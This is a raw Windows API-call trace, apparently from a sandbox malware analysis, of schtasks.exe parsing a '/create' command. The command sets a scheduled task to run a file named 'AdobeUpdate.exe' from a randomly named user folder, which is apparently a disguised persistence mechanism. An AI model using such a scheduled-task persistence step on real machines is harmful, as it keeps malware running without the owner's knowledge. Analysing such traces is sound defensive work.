_Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tr|") returned 4 [0071.112] lstrlenW (lpString="|end|") returned 5 [0071.112] lstrlenW (lpString="|tr|") returned 4 [0071.112] StrStrIW (lpFirst="|end|", lpSrch="|tr|") returned 0x0 [0071.112] SetLastError (dwErrCode=0x490) [0071.112] lstrlenW (lpString="showsid") returned 7 [0071.112] lstrlenW (lpString="showsid") returned 7 [0071.112] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.112] lstrlenW (lpString="tr") returned 2 [0071.112] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.112] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0xa, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|showsid|") returned 9 [0071.112] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f6e0 | out: _Buffer="|tr|") returned 4 [0071.112] lstrlenW (lpString="|showsid|") returned 9 [0071.112] lstrlenW (lpString="|tr|") returned 4 [0071.112] StrStrIW (lpFirst="|showsid|", lpSrch="|tr|") returned 0x0 [0071.112] SetLastError (dwErrCode=0x490) [0071.112] SetLastError (dwErrCode=0x490) [0071.112] SetLastError (dwErrCode=0x0) [0071.112] lstrlenW (lpString="/tr") returned 3 [0071.112] StrChrIW (lpStart="/tr", wMatch=0x3a) returned 0x0 [0071.112] SetLastError (dwErrCode=0x490) [0071.112] SetLastError (dwErrCode=0x0) [0071.112] lstrlenW (lpString="/tr") returned 3 [0071.112] GetProcessHeap () returned 0x480000 [0071.112] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x8) returned 0x496a28 [0071.112] GetProcessHeap () returned 0x480000 [0071.112] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495488 [0071.112] SetLastError (dwErrCode=0x0) [0071.113] SetLastError (dwErrCode=0x0) [0071.113] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.113] lstrlenW (lpString="-/") returned 2 [0071.113] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0071.113] SetLastError (dwErrCode=0x490) [0071.113] SetLastError (dwErrCode=0x490) [0071.113] SetLastError (dwErrCode=0x0) [0071.113] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.113] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe" [0071.113] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.113] GetProcessHeap () returned 0x480000 [0071.113] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494dc8 [0071.113] _memicmp (_Buf1=0x494dc8, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.113] GetProcessHeap () returned 0x480000 [0071.113] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0xc) returned 0x494de0 [0071.113] GetProcessHeap () returned 0x480000 [0071.113] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494df8 [0071.113] _memicmp (_Buf1=0x494df8, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.113] GetProcessHeap () returned 0x480000 [0071.113] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x60) returned 0x496a38 [0071.113] SetLastError (dwErrCode=0x7a) [0071.113] SetLastError (dwErrCode=0x0) [0071.113] SetLastError (dwErrCode=0x0) [0071.113] lstrlenW (lpString="C") returned 1 [0071.113] SetLastError (dwErrCode=0x490) [0071.113] SetLastError (dwErrCode=0x0) [0071.113] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.113] GetProcessHeap () returned 0x480000 [0071.113] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x5c) returned 0x496aa0 [0071.113] GetProcessHeap () returned 0x480000 [0071.113] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4954a8 [0071.113] SetLastError (dwErrCode=0x0) [0071.113] GetProcessHeap () returned 0x480000 [0071.113] GetProcessHeap () returned 0x480000 [0071.113] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x496a08) returned 1 [0071.113] GetProcessHeap () returned 0x480000 [0071.113] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x496a08) returned 0x8 [0071.114] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x496a08 | out: hHeap=0x480000) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4953e8) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4953e8) returned 0x14 [0071.114] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4953e8 | out: hHeap=0x480000) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494d98) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494d98) returned 0x10 [0071.114] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494d98 | out: hHeap=0x480000) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495428) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495428) returned 0x14 [0071.114] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495428 | out: hHeap=0x480000) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x496a18) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x496a18) returned 0x8 [0071.114] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x496a18 | out: hHeap=0x480000) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495448) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495448) returned 0x14 [0071.114] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495448 | out: hHeap=0x480000) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x493af8) returned 1 [0071.114] GetProcessHeap () returned 0x480000 [0071.114] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x493af8) returned 0x20 [0071.114] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x493af8 | out: hHeap=0x480000) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495468) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495468) returned 0x14 [0071.115] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495468 | out: hHeap=0x480000) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x496a28) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x496a28) returned 0x8 [0071.115] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x496a28 | out: hHeap=0x480000) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495488) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495488) returned 0x14 [0071.115] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495488 | out: hHeap=0x480000) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x496aa0) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x496aa0) returned 0x5c [0071.115] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x496aa0 | out: hHeap=0x480000) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4954a8) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4954a8) returned 0x14 [0071.115] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4954a8 | out: hHeap=0x480000) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494c78) returned 1 [0071.115] GetProcessHeap () returned 0x480000 [0071.115] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494c78) returned 0x10 [0071.115] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494c78 | out: hHeap=0x480000) returned 1 [0071.491] SetLastError (dwErrCode=0x0) [0071.491] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0071.491] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0071.491] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0071.491] VerifyVersionInfoW (in: lpVersionInformation=0x13caf8, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x13caf8) returned 1 [0071.491] SetLastError (dwErrCode=0x0) [0071.491] lstrlenW (lpString="create") returned 6 [0071.491] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0071.491] SetLastError (dwErrCode=0x490) [0071.491] SetLastError (dwErrCode=0x0) [0071.491] lstrlenW (lpString="create") returned 6 [0071.491] GetProcessHeap () returned 0x480000 [0071.491] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x4954a8 [0071.491] GetProcessHeap () returned 0x480000 [0071.491] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494c78 [0071.491] _memicmp (_Buf1=0x494c78, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.491] GetProcessHeap () returned 0x480000 [0071.491] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x16) returned 0x495488 [0071.491] SetLastError (dwErrCode=0x0) [0071.492] _memicmp (_Buf1=0x494cf0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x495b30, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0071.492] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0071.492] GetProcessHeap () returned 0x480000 [0071.492] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x74e) returned 0x495d40 [0071.492] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x495d40 | out: lpData=0x495d40) returned 1 [0071.492] VerQueryValueW (in: pBlock=0x495d40, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13cc00, puLen=0x13cc04 | out: lplpBuffer=0x13cc00*=0x4960dc, puLen=0x13cc04) returned 1 [0071.492] _memicmp (_Buf1=0x494cf0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.492] _vsnwprintf (in: _Buffer=0x495b30, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x13cbe8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0071.492] VerQueryValueW (in: pBlock=0x495d40, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x13cc10, puLen=0x13cc0c | out: lplpBuffer=0x13cc10*=0x495f08, puLen=0x13cc0c) returned 1 [0071.492] lstrlenW (lpString="schtasks.exe") returned 12 [0071.492] lstrlenW (lpString="schtasks.exe") returned 12 [0071.492] lstrlenW (lpString=".EXE") returned 4 [0071.492] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0071.492] lstrlenW (lpString="schtasks.exe") returned 12 [0071.492] lstrlenW (lpString=".EXE") returned 4 [0071.492] lstrlenW (lpString="schtasks") returned 8 [0071.493] lstrlenW (lpString="/create") returned 7 [0071.493] _memicmp (_Buf1=0x494cf0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.493] _vsnwprintf (in: _Buffer=0x495b30, _BufferCount=0x19, _Format="%s %s", _ArgList=0x13cbe8 | out: _Buffer="schtasks /create") returned 16 [0071.493] _memicmp (_Buf1=0x494d50, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.493] GetProcessHeap () returned 0x480000 [0071.493] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x14) returned 0x495468 [0071.493] _memicmp (_Buf1=0x494d68, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.493] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x4967c8, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0071.493] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0071.493] GetProcessHeap () returned 0x480000 [0071.493] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x30) returned 0x496aa0 [0071.493] _vsnwprintf (in: _Buffer=0x496720, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x13cbec | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0071.493] GetProcessHeap () returned 0x480000 [0071.493] GetProcessHeap () returned 0x480000 [0071.493] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495d40) returned 1 [0071.493] GetProcessHeap () returned 0x480000 [0071.493] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495d40) returned 0x74e [0071.493] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495d40 | out: hHeap=0x480000) returned 1 [0071.493] SetLastError (dwErrCode=0x0) [0071.493] GetThreadLocale () returned 0x409 [0071.493] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.493] lstrlenW (lpString="create") returned 6 [0071.493] GetThreadLocale () returned 0x409 [0071.493] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.493] lstrlenW (lpString="?") returned 1 [0071.493] GetThreadLocale () returned 0x409 [0071.493] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.493] lstrlenW (lpString="s") returned 1 [0071.493] GetThreadLocale () returned 0x409 [0071.493] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.493] lstrlenW (lpString="u") returned 1 [0071.493] GetThreadLocale () returned 0x409 [0071.493] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="p") returned 1 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="ru") returned 2 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="rp") returned 2 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="sc") returned 2 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="mo") returned 2 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="d") returned 1 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="m") returned 1 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="i") returned 1 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="tn") returned 2 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="tr") returned 2 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="st") returned 2 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="sd") returned 2 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.494] lstrlenW (lpString="ed") returned 2 [0071.494] GetThreadLocale () returned 0x409 [0071.494] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="it") returned 2 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="et") returned 2 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="k") returned 1 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="du") returned 2 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="ri") returned 2 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="z") returned 1 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="f") returned 1 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="v1") returned 2 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="xml") returned 3 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="ec") returned 2 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="rl") returned 2 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="delay") returned 5 [0071.495] GetThreadLocale () returned 0x409 [0071.495] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0071.495] lstrlenW (lpString="np") returned 2 [0071.495] SetLastError (dwErrCode=0x0) [0071.496] SetLastError (dwErrCode=0x0) [0071.496] lstrlenW (lpString="/create") returned 7 [0071.496] lstrlenW (lpString="-/") returned 2 [0071.496] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0071.496] lstrlenW (lpString="create") returned 6 [0071.496] lstrlenW (lpString="create") returned 6 [0071.496] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.496] lstrlenW (lpString="create") returned 6 [0071.496] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.496] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|create|") returned 8 [0071.496] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|create|") returned 8 [0071.496] lstrlenW (lpString="|create|") returned 8 [0071.496] lstrlenW (lpString="|create|") returned 8 [0071.496] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0071.496] SetLastError (dwErrCode=0x0) [0071.496] SetLastError (dwErrCode=0x0) [0071.496] SetLastError (dwErrCode=0x0) [0071.496] lstrlenW (lpString="/sc") returned 3 [0071.496] lstrlenW (lpString="-/") returned 2 [0071.496] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0071.496] lstrlenW (lpString="create") returned 6 [0071.496] lstrlenW (lpString="create") returned 6 [0071.496] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.496] lstrlenW (lpString="sc") returned 2 [0071.496] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.496] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|create|") returned 8 [0071.496] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 [0071.496] lstrlenW (lpString="|create|") returned 8 [0071.496] lstrlenW (lpString="|sc|") returned 4 [0071.496] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0071.496] SetLastError (dwErrCode=0x490) [0071.496] lstrlenW (lpString="?") returned 1 [0071.496] lstrlenW (lpString="?") returned 1 [0071.496] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.496] lstrlenW (lpString="sc") returned 2 [0071.497] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.497] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|?|") returned 3 [0071.497] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 [0071.497] lstrlenW (lpString="|?|") returned 3 [0071.497] lstrlenW (lpString="|sc|") returned 4 [0071.497] SetLastError (dwErrCode=0x490) [0071.497] lstrlenW (lpString="s") returned 1 [0071.497] lstrlenW (lpString="s") returned 1 [0071.497] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.497] lstrlenW (lpString="sc") returned 2 [0071.497] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.497] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|s|") returned 3 [0071.497] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 [0071.497] lstrlenW (lpString="|s|") returned 3 [0071.497] lstrlenW (lpString="|sc|") returned 4 [0071.497] SetLastError (dwErrCode=0x490) [0071.497] lstrlenW (lpString="u") returned 1 [0071.497] lstrlenW (lpString="u") returned 1 [0071.497] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.497] lstrlenW (lpString="sc") returned 2 [0071.497] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.497] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|u|") returned 3 [0071.497] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 [0071.497] lstrlenW (lpString="|u|") returned 3 [0071.497] lstrlenW (lpString="|sc|") returned 4 [0071.497] SetLastError (dwErrCode=0x490) [0071.497] lstrlenW (lpString="p") returned 1 [0071.497] lstrlenW (lpString="p") returned 1 [0071.497] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.497] lstrlenW (lpString="sc") returned 2 [0071.497] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.497] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|p|") returned 3 [0071.498] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 [0071.498] lstrlenW (lpString="|p|") returned 3 [0071.498] lstrlenW (lpString="|sc|") returned 4 [0071.498] SetLastError (dwErrCode=0x490) [0071.498] lstrlenW (lpString="ru") returned 2 [0071.498] lstrlenW (lpString="ru") returned 2 [0071.498] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.498] lstrlenW (lpString="sc") returned 2 [0071.498] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.498] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|ru|") returned 4 [0071.498] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 